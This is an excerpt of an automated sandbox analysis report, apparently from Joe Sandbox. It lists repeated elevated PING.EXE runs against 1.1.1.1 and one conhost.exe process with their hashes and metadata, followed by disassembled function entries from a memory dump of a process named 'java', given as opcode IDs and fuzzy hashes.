      Imagebase:0x7ff6aae00000
      File size:22'528 bytes
      MD5 hash:2F46799D79D22AC72C241EC0322B011D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:31
      Start time:17:46:28
      Start date:23/04/2024
      Path:C:\Windows\System32\PING.EXE
      Wow64 process (32bit):false
      Commandline:"C:\Windows\system32\PING.EXE" 1.1.1.1
      Imagebase:0x7ff6aae00000
      File size:22'528 bytes
      MD5 hash:2F46799D79D22AC72C241EC0322B011D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:32
      Start time:17:46:31
      Start date:23/04/2024
      Path:C:\Windows\System32\PING.EXE
      Wow64 process (32bit):false
      Commandline:"C:\Windows\system32\PING.EXE" 1.1.1.1
      Imagebase:0x7ff6aae00000
      File size:22'528 bytes
      MD5 hash:2F46799D79D22AC72C241EC0322B011D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:33
      Start time:17:46:34
      Start date:23/04/2024
      Path:C:\Windows\System32\PING.EXE
      Wow64 process (32bit):false
      Commandline:"C:\Windows\system32\PING.EXE" 1.1.1.1
      Imagebase:0x7ff6aae00000
      File size:22'528 bytes
      MD5 hash:2F46799D79D22AC72C241EC0322B011D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:34
      Start time:17:46:38
      Start date:23/04/2024
      Path:C:\Windows\System32\PING.EXE
      Wow64 process (32bit):false
      Commandline:"C:\Windows\system32\PING.EXE" 1.1.1.1
      Imagebase:0x7ff6aae00000
      File size:22'528 bytes
      MD5 hash:2F46799D79D22AC72C241EC0322B011D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:35
      Start time:17:46:41
      Start date:23/04/2024
      Path:C:\Windows\System32\PING.EXE
      Wow64 process (32bit):false
      Commandline:"C:\Windows\system32\PING.EXE" 1.1.1.1
      Imagebase:0x7ff6aae00000
      File size:22'528 bytes
      MD5 hash:2F46799D79D22AC72C241EC0322B011D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:37
      Start time:17:46:44
      Start date:23/04/2024
      Path:C:\Windows\System32\PING.EXE
      Wow64 process (32bit):false
      Commandline:"C:\Windows\system32\PING.EXE" 1.1.1.1
      Imagebase:0x7ff6aae00000
      File size:22'528 bytes
      MD5 hash:2F46799D79D22AC72C241EC0322B011D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:38
      Start time:17:46:48
      Start date:23/04/2024
      Path:C:\Windows\System32\PING.EXE
      Wow64 process (32bit):false
      Commandline:"C:\Windows\system32\PING.EXE" 1.1.1.1
      Imagebase:0x7ff6aae00000
      File size:22'528 bytes
      MD5 hash:2F46799D79D22AC72C241EC0322B011D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:39
      Start time:17:46:51
      Start date:23/04/2024
      Path:C:\Windows\System32\PING.EXE
      Wow64 process (32bit):false
      Commandline:"C:\Windows\system32\PING.EXE" 1.1.1.1
      Imagebase:0x7ff6aae00000
      File size:22'528 bytes
      MD5 hash:2F46799D79D22AC72C241EC0322B011D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:40
      Start time:17:46:55
      Start date:23/04/2024
      Path:C:\Windows\System32\PING.EXE
      Wow64 process (32bit):false
      Commandline:"C:\Windows\system32\PING.EXE" 1.1.1.1
      Imagebase:0x7ff6aae00000
      File size:22'528 bytes
      MD5 hash:2F46799D79D22AC72C241EC0322B011D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:42
      Start time:17:46:55
      Start date:23/04/2024
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff70f010000
      File size:862'208 bytes
      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
      Has elevated privileges:true
      Has administrator privileges:false
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:43
      Start time:17:46:58
      Start date:23/04/2024
      Path:C:\Windows\System32\PING.EXE
      Wow64 process (32bit):false
      Commandline:"C:\Windows\system32\PING.EXE" 1.1.1.1
      Imagebase:0x7ff6aae00000
      File size:22'528 bytes
      MD5 hash:2F46799D79D22AC72C241EC0322B011D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:44
      Start time:17:47:01
      Start date:23/04/2024
      Path:C:\Windows\System32\PING.EXE
      Wow64 process (32bit):false
      Commandline:"C:\Windows\system32\PING.EXE" 1.1.1.1
      Imagebase:0x7ff6aae00000
      File size:22'528 bytes
      MD5 hash:2F46799D79D22AC72C241EC0322B011D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:45
      Start time:17:47:04
      Start date:23/04/2024
      Path:C:\Windows\System32\PING.EXE
      Wow64 process (32bit):false
      Commandline:"C:\Windows\system32\PING.EXE" 1.1.1.1
      Imagebase:0x7ff6aae00000
      File size:22'528 bytes
      MD5 hash:2F46799D79D22AC72C241EC0322B011D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:46
      Start time:17:47:08
      Start date:23/04/2024
      Path:C:\Windows\System32\PING.EXE
      Wow64 process (32bit):false
      Commandline:"C:\Windows\system32\PING.EXE" 1.1.1.1
      Imagebase:0x7ff6aae00000
      File size:22'528 bytes
      MD5 hash:2F46799D79D22AC72C241EC0322B011D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:47
      Start time:17:47:11
      Start date:23/04/2024
      Path:C:\Windows\System32\PING.EXE
      Wow64 process (32bit):false
      Commandline:"C:\Windows\system32\PING.EXE" 1.1.1.1
      Imagebase:0x7ff6aae00000
      File size:22'528 bytes
      MD5 hash:2F46799D79D22AC72C241EC0322B011D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:48
      Start time:17:47:15
      Start date:23/04/2024
      Path:C:\Windows\System32\PING.EXE
      Wow64 process (32bit):false
      Commandline:"C:\Windows\system32\PING.EXE" 1.1.1.1
      Imagebase:0x7ff6aae00000
      File size:22'528 bytes
      MD5 hash:2F46799D79D22AC72C241EC0322B011D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:49
      Start time:17:47:18
      Start date:23/04/2024
      Path:C:\Windows\System32\PING.EXE
      Wow64 process (32bit):false
      Commandline:"C:\Windows\system32\PING.EXE" 1.1.1.1
      Imagebase:0x7ff6aae00000
      File size:22'528 bytes
      MD5 hash:2F46799D79D22AC72C241EC0322B011D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:50
      Start time:17:47:22
      Start date:23/04/2024
      Path:C:\Windows\System32\PING.EXE
      Wow64 process (32bit):false
      Commandline:"C:\Windows\system32\PING.EXE" 1.1.1.1
      Imagebase:0x7ff6aae00000
      File size:22'528 bytes
      MD5 hash:2F46799D79D22AC72C241EC0322B011D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      General

      Target ID:51
      Start time:17:47:25
      Start date:23/04/2024
      Path:C:\Windows\System32\PING.EXE
      Wow64 process (32bit):false
      Commandline:"C:\Windows\system32\PING.EXE" 1.1.1.1
      Imagebase:0x7ff6aae00000
      File size:22'528 bytes
      MD5 hash:2F46799D79D22AC72C241EC0322B011D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      Disassembly

      Reset < >

        Executed Functions

        Function 021B0672 Relevance: .1, Instructions: 57COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000002.00000002.1436269917.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_21b0000_java.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: d9a6dc49632ee1f4aaa7aeeba0d2ffed67b35000d88a37096794ccd7dcb2ccca
        • Instruction ID: e5093e384259ce1c3ddf1f2c2ef0000cb1dc8c45dc99a934f594b95d74ccdcf2
        • Opcode Fuzzy Hash: d9a6dc49632ee1f4aaa7aeeba0d2ffed67b35000d88a37096794ccd7dcb2ccca
        • Instruction Fuzzy Hash: A91156B6C4022A9FCB29DF58C9815EEF3B0FF8C314B568569DC65A3241D3346960CB80
        Uniqueness

        Uniqueness Score: -1.00%

        Function 021B0667 Relevance: .1, Instructions: 55COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000002.00000002.1436269917.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_21b0000_java.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 95bc8767ee86f6279d91c0a55483095f7d0672b632bac10176fc646e6ccd3f78
        • Instruction ID: 5bfe00abfd258dbe0485cf87cd81af22dbc3e192b2071abb49d85ba625f4a48c
        • Opcode Fuzzy Hash: 95bc8767ee86f6279d91c0a55483095f7d0672b632bac10176fc646e6ccd3f78
        • Instruction Fuzzy Hash: 99118B76C4022A9FCF25CF98C8825EEB7B0FF48314B564159DC64A3342D3386D60CB81
        Uniqueness

        Uniqueness Score: -1.00%

        Function 021B0722 Relevance: .0, Instructions: 22COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000002.00000002.1436269917.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_21b0000_java.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 7feada6f3850fc7dbd6e5eff6cbb7e98d13dbbcaf57176709a0878f6c2d464e2
        • Instruction ID: ff86ab2928ab6e7aa63afbb8e662f72f2abb2a074dc174342a7e61cfeea66615
        • Opcode Fuzzy Hash: 7feada6f3850fc7dbd6e5eff6cbb7e98d13dbbcaf57176709a0878f6c2d464e2
        • Instruction Fuzzy Hash: 99F0157AC40229DB8B15CF48C4440EEF7B1EF08218B1A8496DC683B641D332AD62CF81
        Uniqueness

        Uniqueness Score: -1.00%

        Function 021C4CCD Relevance: .0, Instructions: 22COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000002.00000002.1436269917.00000000021B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B2000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_21b2000_java.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 573fb40aa9f8072f92a3d4df0eb223a1e52e10057e23bb2f17b5634f0bf805a5
        • Instruction ID: 55d355e6f974fa0988cbc9b4de225052e2720940831ab0ecd92e68837672a1db
        • Opcode Fuzzy Hash: 573fb40aa9f8072f92a3d4df0eb223a1e52e10057e23bb2f17b5634f0bf805a5
        • Instruction Fuzzy Hash: 0EF0DFB5900A06EBEB15CF20C0047EAF7B4FB88704F04420AD42C53310C778B429CBD0
        Uniqueness

        Uniqueness Score: -1.00%

        Function 021C4B78 Relevance: .0, Instructions: 21COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000002.00000002.1436269917.00000000021B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B2000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_21b2000_java.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 7892382c7e87cbe892ef317325beead71126cdf1cc49c95fd8b2d1beaf147f8f
        • Instruction ID: 3cb8fd558098d9c4e5d4ae2e11969679265ad8464eaf39e18382f15684f63760
        • Opcode Fuzzy Hash: 7892382c7e87cbe892ef317325beead71126cdf1cc49c95fd8b2d1beaf147f8f
        • Instruction Fuzzy Hash: A7F079B6A00A06EBDB258F65C0047DAFBB4BB88718F15821AD82C67350D778B469CBC0
        Uniqueness

        Uniqueness Score: -1.00%

        Function 021BEC1C Relevance: .0, Instructions: 20COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000002.00000002.1436269917.00000000021B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B2000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_21b2000_java.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 02f051952b09aae8fced885c6f16f6d8e2b1e5c5e543b6adddce5b8b3048d1d3
        • Instruction ID: 02977aafff7cacc46ec1dd390f0bc582c0932b107b3d92c9eea37ba4114f76ae
        • Opcode Fuzzy Hash: 02f051952b09aae8fced885c6f16f6d8e2b1e5c5e543b6adddce5b8b3048d1d3
        • Instruction Fuzzy Hash: D0F092B5900A06EBDB15CF61C0047DAFBB4BB88714F15421AC42C67750D778B469CBC0
        Uniqueness

        Uniqueness Score: -1.00%

        Function 021BDA35 Relevance: .0, Instructions: 18COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000002.00000002.1436269917.00000000021B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B2000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_21b2000_java.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: e1c5a98bcc2ed15fb0a8fd437faf8bca7e7958bf5bffea3c651793372e85bc02
        • Instruction ID: 86cd0b15a2c1f946145eca831c73053fd3154b3cf9bd4a33ccbaa95bad211c6b
        • Opcode Fuzzy Hash: e1c5a98bcc2ed15fb0a8fd437faf8bca7e7958bf5bffea3c651793372e85bc02
        • Instruction Fuzzy Hash: 60F0CAB6D00B0AABDB258F61C4047DAFBB5BB88714F19461AC42C63320D378B469CBC0
        Uniqueness

        Uniqueness Score: -1.00%

        Function 021C3C76 Relevance: .0, Instructions: 18COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000002.00000002.1436269917.00000000021B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B2000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_21b2000_java.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 8d46efb364ed73f2613de4968c3797d07ba027331f2278712712de85ac62d465
        • Instruction ID: 4b6138809db2e9f201ffda93c2a6294002f84d03c18bfebe3e20f872b781ac15
        • Opcode Fuzzy Hash: 8d46efb364ed73f2613de4968c3797d07ba027331f2278712712de85ac62d465
        • Instruction Fuzzy Hash: 1BF0CAB6D00A0AABDB258F61C0047CAFBB4BB88714F15461AC42C67320D378B469CBC0
        Uniqueness

        Uniqueness Score: -1.00%

        Function 021C45E9 Relevance: .0, Instructions: 18COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000002.00000002.1436269917.00000000021B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B2000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_21b2000_java.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: a9c8c84c819ef9c0f536123963c9b27d3871c3655ade0749758cc8fa5707e72f
        • Instruction ID: 2dbb0cb5e0d0e4e2607fac21fbdb750503d8e3263e5338f4a2f5a9fe938ea6f7
        • Opcode Fuzzy Hash: a9c8c84c819ef9c0f536123963c9b27d3871c3655ade0749758cc8fa5707e72f
        • Instruction Fuzzy Hash: ADF0C2B6D00A06ABDB258F61C0047DAFBB5BB48714F15461AC52C63310D378B465CBC0
        Uniqueness

        Uniqueness Score: -1.00%

        Non-executed Functions

        Function 021B03C0 Relevance: .1, Instructions: 70COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000002.00000002.1436269917.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_2_2_21b0000_java.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: a012a9fb5cf5d9e1554885d89a3030425dd9bcc3e3bcfa4e280c99466c7885fc
        • Instruction ID: b069e4b5ef7ec6aafe685f94c55c83e36648c36bfe8ff910f640c49c573764fb
        • Opcode Fuzzy Hash: a012a9fb5cf5d9e1554885d89a3030425dd9bcc3e3bcfa4e280c99466c7885fc
        • Instruction Fuzzy Hash: 4721C4BA5442568FDB358F1988403DAB7A5EF58314F21482EDECAA7710D3306A898B51
        Uniqueness

        Uniqueness Score: -1.00%